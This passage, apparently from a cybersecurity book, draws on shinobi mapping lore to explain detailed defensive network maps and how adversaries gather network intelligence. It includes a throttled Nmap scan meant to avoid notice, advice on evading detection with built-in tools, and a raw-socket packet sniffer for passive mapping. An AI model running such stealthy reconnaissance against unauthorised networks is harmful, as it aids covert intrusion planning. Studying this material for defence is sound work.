this process until you reach your destination. Now imagine this world’s

cartographers, who would have likely given up on producing accurate

maps, unable to keep up with the ever-changing network. These map-

makers would have to be satisfied with labeling key landmarks and points

of interest with generic names and drawing fuzzy lines between these

points to indicate that paths of some sort exist between them.
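The analogy maps directly to code. In the sketch below, each "router" holds a table of next hops, and the packet's TTL plays the role of the hole-punched travel card. The node names and routes are invented for illustration.

routing_tables = {
    "A": {"10.0.2.0/24": "B"},
    "B": {"10.0.2.0/24": "C"},
    "C": {"10.0.2.0/24": "C"},  # C delivers to the destination itself
}

def forward(src: str, dest_net: str, ttl: int = 8) -> None:
    node = src
    while ttl > 0:
        next_hop = routing_tables[node][dest_net]  # ask the router at this corner
        print(f"{node} -> {next_hop} (ttl={ttl})")
        if next_hop == node:
            print("delivered")
            return
        node, ttl = next_hop, ttl - 1  # stamp the card and punch a hole
    print("ttl expired; packet dropped")

forward("A", "10.0.2.0/24")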

This hypothetical situation is in fact what exists in cyberspace, and

it’s why network maps are not as accurate, and their maintenance not as prioritized, as they should be.

work maps is a recognized challenge for cybersecurity organizations. If an

organization has a map at all, it’s typically provided to the security opera-

tions center (SOC) to illustrate where sensors or security devices are in

the flow of data and to better understand packet captures, firewall rules,

alerts, and system logs. However, it’s probably also abstract, describing only

basic features, such as boundaries for the internet, perimeter network, and

intranet; the general location of edge routers or firewalls; and unspecified

network boundaries and conceptual arrangements, indicated by cloudy

bubbles. An example of an underdeveloped, yet common, network map

available to cybersecurity and IT professionals is provided in Figure 1-1.

To describe why Figure 1-1 is a “bad” map, let’s reexamine the

Bansenshūkai’s advice on mapping in terms of the equivalent cyber details.

All access points of a node in the network. What types of interface

access points are present on the device (Ethernet [e], Fast-Ethernet

[fe], Gigabit-Ethernet [ge], Universal Serial Bus [USB], Console

[con], Loop-back [lo], Wi-Fi [w], and so on)? Is there network access

control (NAC) or media access control (MAC) address filtering? Is

remote or local console access enabled or not locked down? What

type of physical security is present? Are there rack door locks or even

USB locks? Is interface access logging being performed? Where are

the network management interface and network? What are the IP

address and MAC address of each access point?


Figure 1-1: A simplified network map, showing only an internet cloud, an ISP link, a core router, a firewall, a DMZ, a switch, and unlabeled Floor 2 and Floor 3 segments

The bordering gateways, hops, and egress points. Is there more

than one internet service provider (ISP)? Is it a Trusted Internet

Connection (TIC) or Managed Internet Service (MIS)? What is the

bandwidth of the internet connection? Is the egress connection

made of fiber, Ethernet, coaxial, or other media? What are the hops

that approach the network? Are there satellite, microwave, laser, or

Wi-Fi egress methods in or out of the network?

The design, makeup, and layout of the network. What is each sub-

net’s name, purpose, and size (for example, Classless Inter-Domain

routing [CIDR])? Are there virtual local area networks (VLANs)?

Are there connection pool limits? Is the network flat or hierarchical


or divided based on building structures or defense layers and/or

function?

The hosts and nodes of the network. What are their names? What

is their operating system (OS) version? What services/ports are they

running, and which do they have open? What security controls do

they have that might detect an attack? Do they have any known

Common Vulnerabilities and Exposures (CVEs)?

The physical and logical architecture of the network and building.

Where is the data center located? Are Ethernet jacks available in the

lobby? Does Wi-Fi leak outside the building? Are computer screens

and terminals visible from outside the building? Is security glass

used in the office? Are guest/conference room networks properly

segmented? What are the core access control lists (ACLs) and fire-

wall rules of the network? Where is DNS resolved? What is available

in the perimeter network or DMZ? Are external email providers or

other cloud services used? How is remote access or virtual private

network (VPN) architecture implemented in the network?
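One practical way to keep the answers to these questions current is to store them as structured data rather than a static drawing, so the map can be diffed, queried, and versioned. Here is a minimal sketch; the device names, versions, and identifiers are placeholders, not recommendations.

from dataclasses import dataclass, field

@dataclass
class Interface:
    name: str                        # e.g., "ge 0/0", "eth 1", "con", "usb 0"
    ip: str | None = None
    mac: str | None = None
    connected_to: str | None = None  # hostname at the far end of the link

@dataclass
class Node:
    hostname: str
    model: str
    os_version: str
    services: list[str] = field(default_factory=list)  # e.g., "ssh/22"
    cves: list[str] = field(default_factory=list)      # known vulnerabilities
    interfaces: list[Interface] = field(default_factory=list)

core = Node(
    hostname="core-router",
    model="ExampleCo R2000",  # placeholder model
    os_version="14.2",
    services=["ssh/22", "snmp/161"],
    interfaces=[Interface("ge 0/0", ip="192.0.2.254/30", connected_to="isp-router")],
)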

Organizations without a working network map might instead reference

wiring diagrams or schematics produced by their IT department. These

simplified illustrations document the relative arrangement of systems,

networking equipment, and device connections, and they can function as

references for troubleshooting technical or operational issues within the

network. However, too many organizations forego even these crude dia-

grams in favor of a spreadsheet that catalogs hostnames, model and serial

numbers, street and IP addresses, and data center stack/rack rows for all

equipment. If stakeholders can use this spreadsheet to locate assets and

never have any major network issues or outages, the existence of such docu-

mentation may even discourage the creation of a network map. Appallingly,

some companies rely on an architect or specialist who has a “map” in their

head, and no map is ever formally—or even informally—produced.

To be fair, there are legitimate reasons for the lack of useful network

maps. Building, sharing, and maintaining maps can eat up valuable time

and other resources. Maps are also liable to change. Adding or remov-

ing systems to a network, changing IP addresses, reconfiguring cables, or

pushing new router or firewall rules can all significantly alter the accu-

racy of a map, even if it was made just moments before. In addition, mod-

ern computers and networking devices run dynamic routing and host

configuration protocols that automatically push information to other

systems and networks without the need of a map, meaning networks can

essentially autoconfigure themselves.


Of course, there’s an abundance of software-based “mapping”

tools, such as Nmap,4 that scan networks to discover hosts, visualize

the network via number of hops from the scanner, use Simple Network

Management Protocol (SNMP) to discover and map network topology,

or use router and switch configuration files to quickly generate network

diagrams. Network diagrams generated by tools are convenient, but

they rarely capture all the details or context needed to meet the high-

quality mapping standard that a defender or adversary would want.

Using a combination of mapping tools, network scans, and human

knowledge to draw a software-assisted network map is likely the ideal

solution—but even this approach requires the investment of signifi-

cant time by someone with specialized skills to remain accurate and

thus useful.
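As a small illustration of the software-assisted approach, the sketch below drives Nmap from Python for host discovery, leaving a human to annotate the results. The -sn (ping sweep), -sV (service versions), -T2 (slower timing), and -oX (XML output) options are standard Nmap flags; 192.0.2.0/24 is the reserved documentation subnet.

import subprocess

def discover_hosts(subnet: str = "192.0.2.0/24") -> str:
    result = subprocess.run(
        ["nmap", "-sn", subnet],  # host discovery only; no port scan
        capture_output=True, text=True, check=True,
    )
    return result.stdout

print(discover_hosts())

# A follow-up service scan, throttled to draw less attention:
#   nmap -sV -T2 -oX map.xml 192.0.2.0/24

The tool output is only a starting point; the hard-won details a defender's map needs, such as known credentials and physical cabling, still come from human knowledge.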

Despite these limiting factors, it is crucial that defenders maintain

mapping vigilance. The example map in Figure 1-2 illustrates the level of

detail a defender’s map should include to protect a network.

Distinctive shapes, rather than pictograms, are used to represent

devices in the network. The same shape type is repeated for similar device

types. For example, the circles in Figure 1-2 represent workstations, squares

represent routers, and rectangles represent servers; triangles would repre-

sent email relays or domain controllers if they were present. In addition,

the shapes are empty of texture or background, allowing information writ-

ten inside to be clearly legible.

Every interface (both virtual and physical) is labeled with its type and

number. For example, the Ethernet interface type is labeled eth, and the

interface is numbered the same as it would be physically labeled on the

device, eth 0/0. Unused interfaces are also labeled. Each interface is given

its assigned IP address and subnet when these are known.

Device information, such as hostname, make and model, and

OS version are documented at the top of the device when known.

Vulnerabilities, default credentials, known credentials, and other key

flaws are notated in the center of the device. Running services, soft-

ware, and open ports are documented as well. VLANs, network bound-

aries, layout, and structure should be designed into the network map

and labeled as such, along with any noteworthy information.

Collecting Intelligence Undetected

For shinobi, collecting intelligence without being detected was an elite

skill. Loitering near a castle while taking detailed measurements with a

carpenter square or other device would tip off the inhabitants, exposing


Figure 1-2: A detailed network map. Devices (a Cisco 2911 core router, a Fortigate 50 firewall, a Cisco Catalyst 2960 switch, a Red Hat Apache web server, and workstations on VLANs 10, 20, and 30) are drawn as labeled shapes annotated with hostnames, OS versions, every physical and virtual interface, IP addresses, running services and open ports, default credentials, and known CVEs.


the shinobi as an enemy agent. Consequently, industrious shinobi made

maps during times of peace, when the occupants of fortifications lowered

their guard; at these times, shinobi could travel more freely and invite

less suspicion as they collected data.5

Often, however, shinobi had to come up with ways to furtively take

measurements, note topographical features, and gather other intel-

ligence. Tellingly, the Bansenshūkai includes a description of how to

accurately produce maps in a section about open-disguise techniques,

indicating that shinobi used deception to conduct mapping within plain

sight of the enemy. The scroll references a technique called uramittsu

no jutsu6—the art of estimating distance—that involves finding the dis-

tance to a familiar object using knowledge of the object’s size for scale.

Uramittsu no jutsu also incorporated clever trigonometry tricks; for exam-

ple, a shinobi might lie down with their feet facing the target and use the

known dimensions of their feet to take measurements, all while appear-

ing to nap under a tree.
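The geometry behind such tricks is simple enough to show in a few lines: if you know an object's true size and can measure the angle it subtends, the distance follows from basic trigonometry. The numbers below are invented for illustration.

import math

known_height_m = 9.0      # e.g., a gate tower whose height you already know
apparent_angle_deg = 1.5  # the angle the tower subtends from where you lie

distance_m = known_height_m / math.tan(math.radians(apparent_angle_deg))
print(f"estimated distance: {distance_m:.0f} m")  # roughly 344 m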

Collecting network bearings is one of the first things adversaries do

before attacking a target network or host. Adversary-created maps have

the same purpose as historical ninja maps: identifying and document-

ing the information necessary to infiltrate the target. This information

includes all egress and ingress points to a network: ISP connections; wire-

less access points; UHF, microwave, radio, or satellite points; and cloud,

interconnected, and external networks.

Attackers will also look for Border Gateway Protocol (BGP) gateways

and routes or hops to the network. They’ll look for the network’s repre-

sentational structure, layout, and design; network inventory including

hostnames, appliance models, operating systems, open ports, running

services, and vulnerabilities; and network topology such as subnets,

VLANs, ACLs, and firewall rules.

Many of the network-mapping tools attackers use are “noisy,” as they

communicate to large numbers of hosts, use custom packets, and can

be detected by internal security devices. However, attackers can mitigate

these weaknesses by slowing or throttling the network mapper, using non-

custom (non-suspicious) packets, and even performing manual recon-

naissance with common tools that already exist on the victim host, such

as ping or net. Attackers can also use innocuous reconnaissance methods, in

which the attacker never touches or scans the target but instead collects

information using Shodan or other previously indexed data found via

internet search engines.

More sophisticated adversaries develop tradecraft to perform passive

mapping, a tactic whereby the attacker collects information about a tar-

get without interacting directly with it (without actively scanning it with


Nmap, for example). Another passive mapping tactic is the interpretation

of packets captured from a network interface in promiscuous mode, which

configures a network interface to record and inspect all network commu-

nications; this is the opposite of non-promiscuous mode, in which only communication addressed to the interface itself is recorded and inspected. You

would use promiscuous mode to gain an understanding of the hosts and traffic on a network segment without ever touching them directly.
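As a minimal sketch of this kind of passive collection, the Linux-only Python snippet below opens a raw AF_PACKET socket and inventories which hardware addresses are talking, without sending a single packet. It must run as root, and the interface itself still has to be placed in promiscuous mode (for example, with ip link set eth0 promisc on); all of this is illustrative rather than a complete passive-mapping tool.

import socket

ETH_P_ALL = 0x0003  # capture frames of every protocol

sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(ETH_P_ALL))
while True:
    frame, _ = sock.recvfrom(65535)
    dst, src = frame[0:6].hex(":"), frame[6:12].hex(":")
    ethertype = int.from_bytes(frame[12:14], "big")
    # Each line is a passively observed conversation on the wire.
    print(f"{src} -> {dst} ethertype=0x{ethertype:04x}")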
